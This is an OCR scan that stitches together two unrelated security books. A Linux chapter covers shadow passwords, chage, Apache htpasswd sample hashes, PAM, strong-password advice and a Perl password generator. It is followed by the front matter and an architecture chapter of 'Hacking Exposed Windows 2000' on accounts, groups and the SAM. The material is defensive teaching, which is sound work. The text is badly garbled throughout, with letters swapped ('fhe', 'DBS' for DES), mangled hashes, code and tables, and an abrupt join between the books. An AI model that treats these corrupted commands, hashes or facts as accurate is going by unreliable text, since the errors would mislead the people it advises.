As you can see, /etc/shadow not only hides the encr5^ted passwords from unau- 
thorized viewing, making a dictionary attack very difficult, but it also contains informa- 
tion used in the maintenance of passwords. 

In today's hostile networking environment, password shadowing is essential, and 
most Linux distributions support shadowing. If your current Linux machine does not 
have shadowing implemented, you should convert to shadowing now. 

Q Enabling Shadow Passwords 

Enabling password shadowing is merely a matter of running a few system programs 
already installed on your Linux machine. The following steps describe how to convert 
a machine that does not implement shadow passwords to one that does. 



Pwck— Check Integrity of /etc/passwd 

Eirst, run pwck to verify the integrity of /etc/passwd. Each entry in /etc/passwd is 
checked to see if it follows the proper format and has valid data in each field. The pwck 
program verifies 

T The correct number of fields 

■ A unique username 

■ A valid user and group identifier 
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■ A valid primary group 

■ A valid home directory 
A A valid login shell 

[ root0machinel /root]# pwck 

user adm: directory /var/adm does not exist 

user gopher: directory /usr/lib/gopher-data does not exist 

user gdm: directory /home/gdm does not exist 

pwck: no changes 



Pwconv— Convert to Password Shadowing 

Next, run pwconv to convert to shadowing passwords. It creates the /etc/shadow file 
from an exisfing /etc/passwd file and an optionally existing shadow file (merging fhe 
two shadow files). 

[ rootSmachinel /root]# pwconv 

Congrafulafions. You now have password shadowing and have gone a long way in 
making your Linux passwords more secure. 




You should verify that the conversion to password shadowing was successful by checking the contents 
of / et c /pas s wd to see if all encrypted passwords have been replaced with “x." Additionally, even 
after conversion to password shadowing, it is possible to add a regular, unshadowed account to 
/etc/passwd. Therefore, periodically check the contents of /etc/passwd to ensure that all 
passwords are shadowed. 



Pwunconv— Remove Shadowing 

If if becomes necessary, pwunconv converfs from shadowing fo no use of shadowing by 
creafing an /etc/passwd file from an exisfing /etc/passwd file and an exisfing 
/etc/shadow file. Buf if shouldn'f be necessary, should if? 



Shadow Passwords Command Suite 

Using shadowed passwords also provides a group of fools fo mainfain your passwords. 

The Chage Command 

The mosf imporfanf command in fhe shadow command suife is chage. This command 
changes informafion used by fhe sysfem fo defermine when a user musf change his pass- 
word. To force a user fo change his password affer a specific fime period, use fhe -M option. 



chage [-m mindays] [-M maxdays] [-d lastday] [-1 inactive] 
[-E expiredate] [-W warndays] user 
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T mindays Minimum number of days between password changes 

■ maxdays Maximum number of days during which a password is valid 

■ last day Number of days since January 1, 1970, when the password was 
last changed 

■ inact ive Number of days of inactivity after a password has expired before 
the account is disabled 

■ expiredate Date when the user's account is disabled 

A warndays Number of days of warning before a password change is required 

Other Helpful Shadow Commands 

There are many other commands in the shadow suite. Here is a summary of some of the 
most commonly used commands. For more information, look at the man pages. 

T gpasswd Add new users to a group. 

■ groupadd Create a new group. 

■ groupdel Delete a group. 

■ groupmod Modify group information. 

■ passwd Replace /etc/passwd passwd program to work with 
/etc/shadow. 

■ useradd Add a new user. 

■ userdel Delete a user. 

A usermod Modify a user's information. 



APACHE PASSWORD FILES 

Using the Apache web server, it is possible to password protect parts of the document 
tree with http authentication (discussed further in Chapter 12). Authentication requires us- 
ers to log in to a web site in a similar way to logging in to the Linux machine — they need a 
username and password. These username/password values are usually stored in a file 
on the system. This file must be readable by the user who processes the http requests 
(usually the user named nobody). 




Apache can also use passwords from external databases such as Oracle or LDAP. 



Each line of the file is one record with a username and that user's encr 5 q)ted password 
separated by a colon. These Apache password files may use the same encryption as 
/etc/passwd — either DES or MD5. 
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Here is an example of an Apache authentication password file using DBS: 

al : / f oTYdf . SNqv6 
george : 280vQwqBMRgog 
tom : wNvFNEBEAZFXw 
jerry : ultdPMRqyRk9a 



Here is an example using MD5: 

al : $aprl$RaZWp/ . . $GYchwLLC7 zO 9Na2iUlYVpl 
george : $aprl$NVBr j/ . . $CyoN73WDFMmYLOBrrlc2H/ 
tom: $arpl$S451T/ . . $Dwx JsADcOM65Ne3IlhvBvl 
jerry : $aprl$82UFC...$ j 951 6u7As . dMp2w. HZA/z/ 



These files were created using the htpasswd command that is distributed with 
Apache. For details, execute htpasswd — help. 




Many administrators who wish to have portions of their web pages password protected wiil write a smail 
script to extract the password information from /etc /shadow. This is convenient because the users 
oniy need to remember one password. This is not a good idea, however, because HTTP password au- 
thentication goes over the network in the clear. Even if you took steps to make sure logins were secure 
(replacing telnet with ssh, for example), this HTTP traffic would leave the passwords vulnerable. 




See Chapter 6 for information on attempting to obtain a password over the network by connecting to 
services such as POP, IMAP, and so on. 



Like / et c/pas s wd and unlike / etc / shadow, these files are readable by most users, 
so they can be cracked with Crack or John or other password crackers. 



xoTii; 



Many Linux applications are password protected, and most of them have their own way of storing and 
processing passwords. Examples include Samba (an open source software suite that provides seam- 
less file and print services to SMB/CIFS clients— http://www.samba.org/) and mySQL (an open 
source, mostly free SQL database system— http://www.mysql.com/). 



PLUGGABLE AUTHENTICATION MODULES 

The use of /etc/passwd and /etc/shadow has served the Linux community ade- 
quately for most purposes over the years, but they have certain limitations. If you wish to 
enable new password schemes, there are two possibilities: 

T The administrator must recompile every program that will use this new 
authentication method so it knows how to use it natively, or 

A The administrator must "wrap" the service with an additional login method. 
For the example of logins, a user's shell could be replaced with a dummy shell 
that does a second authentication step before dropping the user to her actual 
login shell. 
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Unfortunately, such methods are not very clean. Some protocols do not have multiple 
authentication methods built in and cannot be easily wrapped as described. 

PAM, an implementation of the Pluggable Authentication Modules system, is a nice 
solution to this problem. PAM was originally created by Sun; however, it was quickly em- 
braced by the Linux community, and many more modules have become easily available. 

PAM allows you to decide what authentication methods are allowed sitewide, or 
based on each service. The authentication methods have their own modules associated 
with them that handle the specific request. Thus, modules can and have been written 
for any method of authentication, such as Kerberos, LDAP, SecurelD, s/Key, OPIE, 
TACACS+, and more. 

Some of the available PAMs in Linux are 

▼ pam_cracklib . so 

■ pam_deny . so 

■ pam_pwdb . so 

A pam_group . so 

Although PAM makes password management more robust, it also means that your 
passwords may be contained in places other than just / etc/pas s wd and / etc / shadow. 
Thus, when doing any proactive password cracking, you should know the sources of all 
your authentication streams. In general, unless you've added special authentication 
methods to your default Linux installation, everything is probably still controlled only by 
/etc/passwd and /etc/shadow. 




For more information on PAM, see http://www.kernei.org/pub/iinux/iibs/pam/. 



PASSWORD PROTECTION 

There are several effective strategies used to implement password protection. The pri- 
mary concept is to use good passwords that will not be cracked using dictionary attack 
cracking programs. 

This part of the chapter will discuss the following concepts: 

T Strategies for creating effective passwords 

■ Use of shadow passwords 

■ How to force good passwords 

■ Password expiration 
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■ One-time passwords 

■ MD5 

A Periodically run password crackers 

O Strategies for Creating Effective Passwords 
First, Bad Passwords 

The first rule for coming up wifh a good password is never fo creafe a bad password. As 
a general rule, bad passwords are based on some combinafion of a name, word, and / or 
a number. The following are bad passwords: 

T joel02367 

■ fido2000 

I testingl23 

■ 8675309 
A ncl701-d 

Passwords fhaf are easy fo remember can be quickly cracked due to the computing 
power of currenf hardware; fherefore, if is essential fhaf you do nof choose a password of 
fhis type. If fhe password is composed of a word fhaf exisfs in some dictionary, then it is 
susceptible to a password attack. Adding digits (such as phone numbers, birthdays, com- 
mon numeric sequences), or spelling the word backwards, does not increase the effective- 
ness of the password because password cracking programs are written to add these 
character sequences to the text that they are testing. Therefore, avoid passwords fhaf con- 
fain any of fhe following: 

T Your name or birfhday 

■ A family member's name or birfhday 

■ A pef's name or birfhday 

■ Your phone number 

■ Any characfer from Dilbert, Sfar Trek, Lord of the Rings, or other popular icons 

■ A non-English word (non-English words are also part of dictionary affacks; do 
not think that picking a non-English password will be more difficult to crack.) 

A Any of fhe above backwards 

Rules to Create Good Passwords 

An effective password is one fhat is hard to guess, not based on a word in any dictionary, 
and relatively easy to remember. Being relatively easy to remember is important: if the pass- 
word is too difficult to remember, users may be tempted to write down their passwords. 



Chapter 9: Password Cracking 



307 



Writing down passwords is dangerous because if the password is written down, another 
person can read it. 

Good passwords follow these simple rules: 



Use at least one character from 


a-z 


each of these character classes: 


A-Z 




punctuation, such as !(*$ 
0-9 


If DBS passwords are used: 


Brom 6 to 8 characters 


If MD5 passwords are used: 


Any number of characters (more than 15 is 
very good) 



A Simple Way to Create Effective Passwords Here is a simple way to create an effective 
password: Think of a phrase that is relatively obscure, but easy to remember. It can be a 
line from a song, book, or a movie. Then, create an acronym from it, including capitalized 
words and punctuation. 




Don’t choose a line or phrase that is too personal. (For example, if you are a well-known fan and 
scholar of Ernest Hemingway, don’t choose the line “Ask not for whom the bell tolls.’’) But make it 
meaningful enough so that it is easy to remember. 



As an example, let's pick a well-known saying by a famous person from a very long 
time ago: 



I came, I saw, I conquered. 



Create an acronym from it: 



Ic, Is, Ic 



Assuming DBS is being used, this follows most of the above password rules. It contains 
at least one character from the lowercase alphas, uppercase alphas, and punctuation. There 
is one rule that this password does not follow: there are no digits in the password. It is easy 
to add a digit, especially if we decide that the character "1" resembles "I": 

Ic, Is, Ic 



Here is another example — a famous line from a movie: 
Wake up! Time to die. 

Create an acronym from it: 



Wu ! Ttd. 
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This is another good password, but one that is also missing a digit; so add one to it: 



Wu ! T2d. 

The number of good passwords that can be created using this method is essentially 
endless. Imagine the fun remembering fondly fhe books, movies, and songs that you 
have enjoyed in the past and creating clever acronyms out of a memorable line! 

If you are concerned that someone may know that you are a scholar of ancient Rome 
or a fan of fine American science fiction films, and therefore fhey may guess your chosen 
line, then think of an original, unique phrase, and create an acronym from that. 

For instance, make up the following sentence: 

Monopoly and Sorry: two games to play. 

Out comes a good password: 



M&S : 2g2p 




Since these password examples are published in this book, they are likely to end up in a password 
cracking program dictionary. Don’t use them. 



Creating Bomb-Proof Passwords To create a password that is virtually impossible to guess, 
use up to 8 random characters if using DBS, or 15 or more random characters using MD5. 

Notice that you should choose varying password lengths. Otherwise, a hacker would 
know to guess passwords of a certain length (like 6 or 15). Here are some examples: 



DBS 


xAS?d4$8 




1— 1 
o 

LO 


MD5 


■'p"LJAxNXnN*>8 0 




03gZXJ3A^DFU 




+ 6 ! /p3 1 zm"/v j J 



The above passwords were generated with the following Perl program. Feel free fo use 
it to create random strings that follow the basic rules of a good password. This program 
prompts you for the desired length of your password and complains if fhe size is less than 
six characters. Then it generates the desired number of random characters, looping imtil it 
generates a password that contains at least one lowercase alpha, one uppercase alpha, one 
digit, and one punctuation character. 



# ! /usr /bin/perl -w 

# passwd_generator.pl 




Chapter 9: Password Cracking 



309 



use strict; 

my @chars = ( 33 . . 91 , 93 . . 12 6 ) ; 
my $num_chars = @ chars; 
my $length; 

my $funny = \ <=>?@ [ \\ ]"_'{ I } ~ ' ; 

print "Enter number of characters in your password: "; 
chomp ( $length = <STDIN>) ; 

die "Length must be greater than 6!" if $length <= 5; 

while (1) { 

my $password = ' ' ; 
foreach (l..$length) { 

Spassword .= chr ( $chars [ int (rand ( $num_chars ) ) ] ) ; 

} 

if ($password =~ /[a-z]/ and $password =~ /[A-Z]/ and 
$password =~ /[0-9]/ and $password =~ /[$funny]/) { 
print $password, "\n"; 
exit ; 





There is one big negative to these very difficuit to guess passwords: they are aimost impossibie to 
remember. And since they are difficuit to remember, the temptation is to write them down, and you 
shouid never do that. 



Q Use Different Passwords on Different Systems 

Don't use the same password on different machines. If you do, and one of fhe passwords 
is cracked, all the machines are compromised. 

However, using different, unique, strong passwords on all your different machines 
makes remembering them difficult. One strategy to deal with this difficulty is to create a 
file of your passwords and encryqjf if using PGP and a sfrong passphrase fhaf you can re- 
member. Then, when you need a password, you can log in fo fhe machine wifh fhaf 
PGP-encryq^fed file and look if up securely — assuming your connection to that computer 
is encryqjted, of course. 




PGP (Pretty Good Privacy) is a suite of toois for encrypting, decrypting, and verifying text. (See 
http://www.pgp.com/.) 



Another option is to pick a suitably strong password and use that password on machines 
of similar imporfance only. Say you have several accormfs at different ISPs. Since they are all 
similar in nature and have the same security level, it would be acceptable to use the same 
strong password on each machine. Then let's say you have an accoimt at a machine at work 
that has highly sensitive classified information. You should not use the same password on 
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this machine as you do on your ISP machines because the importance of your work machine 
is much higher. And you will probably want a strong password on your Linux box at home 
that is different from fhose for your ISP machines and your work machine. 

Q Use Shadow Passwords 

As mentioned before, using shadow passwords makes if much more difficulf for a hacker 
fo run cracking programs on fhe encr 5 ^fed passwords offline, which makes your Linux 
machine much more secure. However, a hacker could still fry aufhenficafing as a user 
wifh sfandard protocols like ssh/telnet/pop wifh automated scripfs fo affempf fo 
crack passwords. However, fhese affempfs usually leave frails in log files. Shadowing 
does nof prevenf hackers from affempfing fo log in, buf shadowing does limif fhe abilify 
of an affacker fo gef fo fhe encr)^fed values. 

O Force Good Passwords 

An imporfanf approach fo good passwords is fo force all users on fhe sysfem fo adhere fo 
good password rules using a ufilify fhaf will rejecf bad passwords. Therefore, when users 
change their password, the password will be checked to see if if follows cerfain rules, and 
if if does nof, fhe new password will be rejecfed. 

Here are some existing fools fhaf can be used fo force good passwords. 

Passwd+ 

Wriffen by Maff Bishop, fhis program replaces passwd. You can find if af ffp:// 
ffp.darfmough.edu/pub/securify/. 

This program improves upon passwd by adding extensive logging capabilifies and 
fhe specification of fhe number of significanf characters fo be used in fhe testing of fhe 
password. You can also creafe an error message fhaf will be displayed fo users when fhey 
choose weak passwords, and you can use fhis fo feach your users how fo creafe sfrong 
passwords. 

Some of fhe rules of passwd+ include rejecting passwords fhaf 

T Use phone numbers, hosfnames, domain names, personal names, logins 

■ Are nof mixed case 

■ Are nof a cerfain number of characters in lengfh 
A Appear in a dicfionary 

Also, a foolkif released wifh passwd+ allows you fo confrol fhe rules and fesfs 
applied fo fhe password. 

Npasswd 

Wriffen by Clyde Hoover, fhis program was wriffen as a response fo fhe Infernef Worm 
in 1988 (a program fhaf adversely affecfed UNIX machines across fhe Infernef). If has 
evolved info a very advanced proacfive password checker. If is designed fo replace 
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passwd, chfn, and chsh. It can be found at http://www.utexas.edu/cc/unix/ 
software / npasswd. 

This program subjects user passwords to stringent checks to decrease the likelihood 
that users will choose weak passwords. It is a commercial-grade solution that greatly en- 
hances password security. 



An I passwd 

This Perl program was written at Argone National Laboratories (hence, anl). It is an im- 
provement upon a program originally written by Larry Wall (Larry is the creator of Perl). 
It can be found at ftp://coast.cs.purdue.edu/pub/tools/unix/anlpasswd. 

It is a good proactive password checker that uses a dictionary file of your choice and 
allows you to create custom rules. Also, it is a well- written Perl program that can give the 
reader some insight into password checking strategies. 



Pluggable Authentication Modules 

PAM can be used to force good passwords at password change time. Here's a snippet of 
the PAM configuration file for the passwd program (/etc/pam . d/pas swd): 



auth 

account 

password 

password 



required 

required 

required 

required 



/lib/security/pam_pwdb . so shadow nullok 
/lib/security/pam_pwdb . so 
/lib/security/pam_cracklib . so retry=3D3 

/lib/security/pam_pwdb . so use_authtok nullok md5 shadow 



In the third line, you can see that the passwd program will check against the 
pam_cracklib library (a PAMified version of the cracklib library by Alec Muffett) to 
determine whether the password the user wishes to use is crackable. Unless the new 
password passes cracklib's tests, the user will not be able to change his password. 

Q Password Expiration 

Having the user passwords expire after a certain amount of time ensures that complete 
brute force password cracking programs will not have enough time to crack a user's pass- 
word. Or, if a password is cracked, it is not valid indefinitely. 

For instance, if I have the password 



Ic, Is, Ic 



a dictionary attack will fail. However, a brute force approach can be used. This means 
that all combinations of all characters will be attempted until my password is guessed. 
This is possible, given a very powerful computer and a sufficient amount of time. So, if I 
am forced to change my password regularly, it will be statistically unlikely to crack my 
password using brute force before it is changed. 

If shadow passwords are implemented, the password expiration is implemented with 
the chage command. To set the maximum number of days that a user's password is valid: 



chage -M 90 username 
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That forces the user's password to become invalid after 90 days. When the user logs in, 
and the password has expired, the user must enter a new password before she can log in. 

Even if password expiration is not implemented, it is a good idea to encourage all us- 
ers to change their passwords every three months. A common policy is to change your 
passwords on the season solstices, which occur every three months on or about March 21, 
June 21, September 21, and December 21. 




Password expiration does have a negative side: if users have to change their passwords often, they 
may be tempted to write them down, which compromises security. 



Q Use One-Time Passwords 

One-time passwords (OTPs) are a strategy that uses a system in which a user will log in 
with a password that will never be used again. This assures that even if the password was 
intercepted in transit by a hacker, it would not be of any use fo the hacker since the pass- 
word is only valid for fhat one login session. There are several ways of implemenfing 
fhis sfrafegy. 

SecurelD This implementation of OTP includes the user carrying a credit card-sized 
electronic device that displays a code that is valid for a specific number of seconds. When 
fhe user wants to log in, he provides his username and the code that is displayed on his 
SecurelD card. The value shown on the card is generated and transmitted by a centralized 
system that uses that code to authenticate the user. The code is valid only for a few sec- 
onds. The pro of this method is that it is secure — a hacker would have to intercept the 
transmission from the SecurelD system to the SecurelD card. The con of this method is 
that it is expensive — each of the cards costs approximately $50, and that adds up quickly 
if an organization buys one for each of its employees. 

S/Key This OTP provides password authentication and is implemented on the server. 
Passwords carmot be reused, so any passwords intercepted in transit are meaningless to a 
hacker. This system uses mathematical functions to generate a list of one-fime-use pass- 
words. It encr)q)ts this string with a stored key, and matches it against the stored n'th 
password. If they are the same, it replaces the n'th password with the one you supplied. 
As long as you know the passphrase associated with your key, you can generate any of 
fhe n passwords the server requires. However, should a hacker sniff the password you 
supply, it will do him no good, because the new password required is different as soon as 
you use one. The actual passwords you supply over the line are made up of six 3- and 
4-letfer words for ease of enfry. 

OPIE OPIE stands for One-Time Passwords in Everything. It is a library based on S/Key 
and is downward compatible. The distribution includes a modified ftp daemon and su 
fhat have OPIE support. It uses the stronger MD5 by default, though it supports the MD4 
used by S/Key. It is also much easier to install and integrate with existing software. You 
can find OPIE at http:/ / www.inner.net/opie/. 
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Q UseMDS 

MD5 allows the user to have arbitrarily long passwords, whereas DBS has a password 
length limit of eight characters. Longer passwords mean more password security (as- 
suming strong passwords). Also, the namespace of MD5 is larger fhan fhaf of DBS, which 
also adds fo securify. So, if possible, use MD5 insfead of DBS. 

Q Run Password Crackers 

Sysfem adminisfrafors should be concerned abouf an attacker rurming a password 
cracker on their passwords. However, that does not mean these password cracking tools 
are all bad. System administrators can run these tools on their machines and try to crack 
the passwords therein, thereby determining which passwords on the system are weak 
and should be changed. It is recommended that these tools be run periodically. 



TIP 



There are some cases of system administrators, especiaiiy contractors, running Crack or other pass- 
word cracking programs on their ciient’s machine and the ciient thinking the contractor was trying to 
crack passwords for some evii purpose, when in fact it was simpiy part of the job. So, if you think it is a 
good idea to crack passwords on a ciient’s machine as part of your job, get written permission first! 



SUMMARY 

Password security is of critical importance — without it your machine will never be safe. 
We have discussed what you can do to protect yourself from a hacker trying to perform 
a password attack. To summarize, those steps are 

T Implement shadow passwords. 

■ Use MD5 instead of DBS. 

■ Borce users to create strong passwords by implementing a good password 
policy that includes tools to test users' passwords when they create new ones. 

■ Periodically run password cracking programs in an attempt to find weak 
passwords on your system. 

■ Consider using password expiration and one-time passwords. 

A Never give your password to someone you don't know. (We already discussed 
this in Chapter 4.) 




HACKNG EXPOSED 
WINDOWS 2000: 
NETWORK SECURITY 
SECRETS & SOLUTIONS 

JOEL SCAMBRAY 
STUART McCLURE 



Osbome/McGraw-Hill 

New York Chicago San Francisco 
Lisbon London Madrid Mexico City Milan 
New Delhi San Juan Seoul Singapore Sydney Toronto 



Osborne/McGraw-Hill 
2600 Tenth Street 
Berkeley, California 94710 
U.S.A. 

To arrange bulk purchase discounts for sales promotions, premiums, or fund-raisers, 
please confacf Osborne/ McGraw-Hill af fhe above address. For information on fransla- 
fions or book disfribufors oufside fhe U.S.A., please see fhe Infernafional Confacf Infor- 
mafion page immediafely following fhe index of fhis book. 

Hacking Exposed Windows'^ 2000: Network Security Secrets & Soiutions 

Copyright © 2001 by The McGraw-Hill Companies. All rights reserved. Printed in the 
United States of America. Except as permitted under the Copyright Act of 1976, no part of 
this publication may be reproduced or distributed in any form or by any means, or stored 
in a database or retrieval system, without the prior written permission of the publisher, 
with the exception that the program listings may be entered, stored, and executed in a 
computer system, but they may not be reproduced for publication. 

1234567890 CUS CUS 01987654321 
ISBN 0-07-219262-3 



Publisher 

Brandon A. Nordin 
Vice President & Associate Publisher 

Scott Rogers 

Senior Acquisitions Editor 
Jane Brownlow 
Project Editor 

Patty Mon 

Acquisitions Coordinator 

Emma Acker 
Technical Editors 
Phil Cox 
Eric Schultze 
Copy Editors 
Sally Engelfried 
Lisa Theobald 
Marcia Baker 



Proofreader 
Pam Vevea 
Indexer 

David Heiret 
Computer Designers 
Carie Abrew 
Elizabeth Jang 
Melinda Moore Lytle 
Illustrators 

Michael Mueller 
Lyssa Wald 
Series Design 
Dick Schwartz 
Peter P. Hancik 
Cover Series Design 
Dodie Shoemaker 



This book was published with Corel Ventura™ Publisher. 



Information has been obtained by Osborne/McGraw-Hill from sources believed to be reliable. However, because of the 
possibility of human or mechanical error by our sources, Osborne/McGraw-Hill, or others, Osborne/McGraw-Hill does not 
guarantee the accuracy, adequacy, or completeness of any information and is not responsible for any errors or omissions or the 
results obtained from use of such information. 




9 



10 



Hacking Exposed Windows 2000: Network Security Secrets 8i Solutions 



B efore we get cracking (pardon the pun) on Windows 2000, it's important to under- 
stand at least some of the basic architecture of the product. This chapter is de- 
signed to lay just such a foundation. It is targeted mainly at those who may not be 
intimately familiar with some of the basic security functionality of Windows 2000, so 
those of you old pros in the audience are advised to skip this discussion and dig right in 
to Chapter 3. 

This is not intended to be an exhaustive, in-depth discussion of the Windows 2000 
security architecture. Several good references for this topic can be found at the end of the 
chapter. In addition, we strongly recommend reading Chapter 16 in this book for a de- 
tailed discussion of new security features in Windows 2000 that can be used to counteract 
many of the attacks covered throughout this book. 

Our focus in this chapter is to give you just enough information to be able to understand 
the primary goal of Windows 2000 attackers: 

To execute commands in the context of the most privileged user account. 

Let's start by introducing some of the critical concepts necessary to flesh out this 
statement. 



THE WINDOWS 2000 SECURITY MODEL 

Windows NT was designed from scratch with security in mind, and not just any security: 
one early design goal was compliance with the U.S. Department of Defense's Trusted 
Computer System Evaluation Criteria (TCSEC), commonly referred to as "the Orange 
Book." TSEC defines several level-of-trust ratings, from D to A1 (lowest to highest), that 
are used to classify a system's security. In 1999, NT 4 Service Pack 6a earned a C2 rating in 
both stand-alone and networked configurations, a significant achievement for a mass 
market commercial operating system. Windows 2000 is in the process of being evaluated 
for a similar rating, using an internationally developed system called the Common Criteria 
for Information Technology Security Evaluation (CCITSE) or just Common Criteria (CC). 
See the "References and Eurther Reading" section at the end of this chapter for links to 
more information on TSEC and CC, as well as Windows NT SP 6a's C2 evaluation and the 
current CC evaluation plan for Windows 2000. 

In order to be rated even higher (B-level), Windows 2000 is required to incorporate 
several key elements into its design, including, but not limited to: 

T A secure logon facility for authentication 

■ Discretionary access control 

A Auditing 

Windows 2000 implements these features via its security subsystem. The Windows 
2000 security subsystem is shown in Pigure 2-1. 
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(Buses, I/O devices, interrupts, interval timers, DMA, memory cache control, and so on) 



Figure 2-1 . The Windows 2000 Security Subsystem (from Inside Microsoft Windows, Third Edition 
by David Soiomon and Mark Russinovich. Reproduced by permission of Microsoft 
Press. Aii rights reserved) 



We are not going to go into detail about all of the elements of fhe sysfem in fhis chap- 
fer, buf we will cover mosf of fhem from a pracfical sfandpoinf. The main poinf fo draw 
from fhis diagram is fhaf Windows 2000 implemenfs a Securify Reference Monitor (SRM) 
fhaf runs in highly privileged kernel mode and checks all access fo resources requesfed 
by code rurming in user mode, where applicafions run. 



XOTE 



Windows 2000 device drivers run in kernel mode, and thus operate outside of the core security func- 
tions of the OS. 
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If the SRM is the gatekeeper for Windows 2000 resources, to what sorts of things can it 
grant or deny access? Nearly all security access control on Windows 2000 resources is 
applied to security principles. Lets discuss security principles in more detail, since they include 
the primary targets of malicious hackers. 



SECURITY PRINCIPLES 

Security principles on Windows 2000 include: 

T Users 
■ Groups 
A Computers 

Let's discuss each in more detail. 



Users 

Anyone with even a passing familiarity with Windows has encountered the concept of 
user accounts. We use accounts to logon to the system and to access resources on the sys- 
tem and the network. Few have considered what an account really represents, however, 
which is one of the most common security failings on most networks. 

Quite simply, an account is a reference context in which the operating system exe- 
cutes most of its code. Put another way, all user mode code executes in the context of a user 
account. Even some code that runs automatically before anyone logs on (such as services) 
runs in the context of an account (the special SYSTEM, or LocalSystem, account). 

All commands invoked by the user who successfully authenticates using the account 
credentials are run with the privileges of that user. Thus, the actions performed by exe- 
cuting code is limited only by the privileges granted to the account that executes it. The 
goal of the malicious hacker is to run code with the highest possible privileges. Thus, the 
hacker must "become" the account with the highest possible privileges. 




Users, physical human beings, are distinct from user accounts, digital manifestations that are easily 
spoofed given knowledge of the account name/password pair. Although we may blur these concepts in 
this book, keep this in mind. 



Built-ins 

NT/2000 comes out of the box with built-in accounts that have predefined privileges. 
These default accounts include the local Administrator account, which is the most power- 
ful user account in Windows 2000 (actually, the SYSTEM account is technically the most 
privileged, but Administrator can execute commands as SYSTEM quite readily using the 
Scheduler Service to launch a command shell). Table 2-1 gives a partial list of built-in ac- 
counts on Windows 2000. 
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Account Name 


Comment 


SYSTEM or LocalSystem 


All-powerful on the local machine 


Administrator 


Essentially all-powerful on the local machine; 
may be renamed, cannot be deleted 


Guest 


Very limited privileges; disabled by default 


l\JSR_machinename 


Used for anonymous access to Internet Information 


(abbreviated lUSR) 


Services (IIS); member of Guests group 


IW AM_machinename 


Out-of-process IIS applications run as this account; 
member of Guests group 


TSlntemetUser 


Used by Terminal Services if installed 


krbtgt 


Kerberos Key Distribution Center Service Account; 
only foimd on domain controllers, disabled by default 


Table 2-1 . Built-in User Accounts on Windows 2000 



To summarize Windows 2000 groups from the malicious hackers perspective: 

The Local Administrator or the SYSTEM account are the juiciest targets on a Windows 2000 
system because they are the most powerful accounts. All other accounts have very limited privi- 
leges relative to the Administrator and SYSTEM. Compromise of the Administrator or SYSTEM 
account is thus almost alivays the ultimate goal of an attacker. 

Groups 

Groups are an administrative convenience — they are logical containers for aggregating 
user accounts (they can also be used to set up email distribution lists in Windows 2000, 
which currently have no security implications). Windows 2000 comes with built-in 
groups, predefined containers for users that also possess varying levels of privilege. Any 
account placed within a group inherits those privileges. The simplest example of this is 
the addition of accounts to the local Administrators group, which essentially promotes 
the added user to all-powerful status on the local machine (you'll see this attempted 
many times throughout this book). Table 2-2 lists built-in groups on Windows 2000. 

When a Windows 2000 system is promoted to a domain controller, a series of predefined 
groups are installed as well. The most powerful predefined groups include the Domain 
Admins, who are all-powerful on a domain, and the Enterprise Admins, who are 
all-powerful throughout a forest. Table 2-3 lists the Windows 2000 predefined groups. 
To summarize Windows 2000 groups from the malicious hackers perspective: 

The local Administrators group is the juiciest target on a local Windows 2000 system because 
members of this group inherit Administrator-equivalent privileges. Domain Admins and Enterprise 
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Group Name 


Comment 


Administrators 


Members are all-powerful on the local machine 


Users 


All user accounts on the local machine; 
a low-privilege group 


Guests 


Same privileges as Users 


Authenticated Users 


Special hidden group that includes all currently 
logged-on users 


Backup Operators 


Not quite as powerful as Adminisfrafors, buf close 


Replicator 


Used for file replicafion in a domain 


Server Operators 


Nof quife as powerful as Adminisfrafors, buf close 


Account Operators 


Nof quife as powerful as Adminisfrafors, buf close 


Print Operators 


Nof quife as powerful as Adminisfrafors, buf close 


Table 2-2. Windows 2000 Built-in Groups 



Group Name 


Comment 


Cerf Publishers 


Enterprise certification and renewal agents 


Domain Admins 


All-powerful on fhe domain 


Domain Users 


All domain users 


Domain Compufers 


All compufers in fhe domain 


Domain Confrollers 


All domain confrollers in fhe domain 


Domain Guesfs 


All domain guesfs 


Group Policy Greafor Owners Members can modify group policy for the domain 


Pre-Windows 2000 
Compatible Access 


Backward compafibilify group 


RAS and IAS Servers 


Remofe access compufers in fhe domain 


DnsAdmins 


DNS adminisfrafors, domain local 


Enterprise Admins 


All-powerful in fhe foresf 


Schema Admins 


Can edif fhe direcfory schema, very powerful 


Table 2-3. Windows 2000 Predefined Groups Installed by Default on Domain Controllers 
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Admins are the juiciest targets on a Windows 2000 domain because joining their ranks elevates priv- 
ileges to all-powerful on the domain. All other groups possess very limited privileges relative to Ad- 
ministrators, Domain Admins, or Enterprise Admins. Addition of a compromised account to the 
local Administrators, Domain Admins, or Enterprise Admins is thus almost always the ultimate 
goal of an attacker. 

Special Identities 

As we have noted, Windows NT/2000 has several special identities, which are containers 
for accounts that transitively pass through certain states (such as being logged on via the 
network) or from certain places (such as interactively at the keyboard). These identities 
can be used to fine-tune access control to resources. For example, access to certain pro- 
cesses is reserved for INTERACTIVE users only under NT / 2000. Table 2-4 lists the Win- 
dows NT/ 2000 special identities. 

Some key points worth noting about these special identities: 

The Everyone group can be leveraged to gain a foothold on a Windows 2000 system without 
authenticating. Also, the INTERACTIVE identity is required in many instances to execute privilege 
escalation attacks against Windows 2000 (see Chapter 6). 

Other Security Principles and Containers 

Eor the sake of comprehensiveness, we will mention at this point the one other security 
principle in Windows 2000: computers, or machine accounts. Computers are essentially 
accounts that are used by machines to logon and access resources. They are named with a 
dollar sign ($) appended to the name of fhe machine (for example, machinename$). There 
are few insfances where exploitation of a machine account results in serious exposure, so 
we will not discuss them much in this book. 

Also, new to Windows 2000, the organizational unit (OU) can be used in addition to 
groups to aggregate user accounts. OUs are arbitrary Active Directory constructs and 
don't inherently possess any privileges like security group built-ins. 



Identity 


Scope 


Comment 


INTERACTIVE 


Local 


Includes all users logged on to the local system via 
the physical console or Terminal Services 


Everyone 


Local 


All current network users, including guests and 
users from ofher domains 


Network 


Local 


Represents users currently accessing a given 
resource over the network 


Table 2-4. Windows NT/2000 Special Identities 
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The SAM and Active Directory 

Where is all of this information about accounts and passwords kept? On all NT and 
stand-alone Windows 2000 computers, the Security Accounts Manager (SAM) contains 
user account name and password information. The password information is kept in a 
scrambled format such that it carmot be unscrambled using known techniques (although 
the scrambled value can still be guessed, as you will see in Chapter 8). The scrambling 
procedure is called a one-way function (OWF) or hashing algorithm, and it results in a hash 
value that carmot be decr)q)ted. We will refer a great deal to the password hashes in this 
book. The SAM makes up one of the five Registry hives and is implemented in the file 
%systemroot% \ system32 \ conf ig\ sam. 

On Windows 2000 domain controllers, user account/hash data is kept in the Active 
Directory (%systemroot%\ntds\ntds.dit by default). The hashes are kept in the same 
format, but they must be accessed via different means. 

SYSKEY 

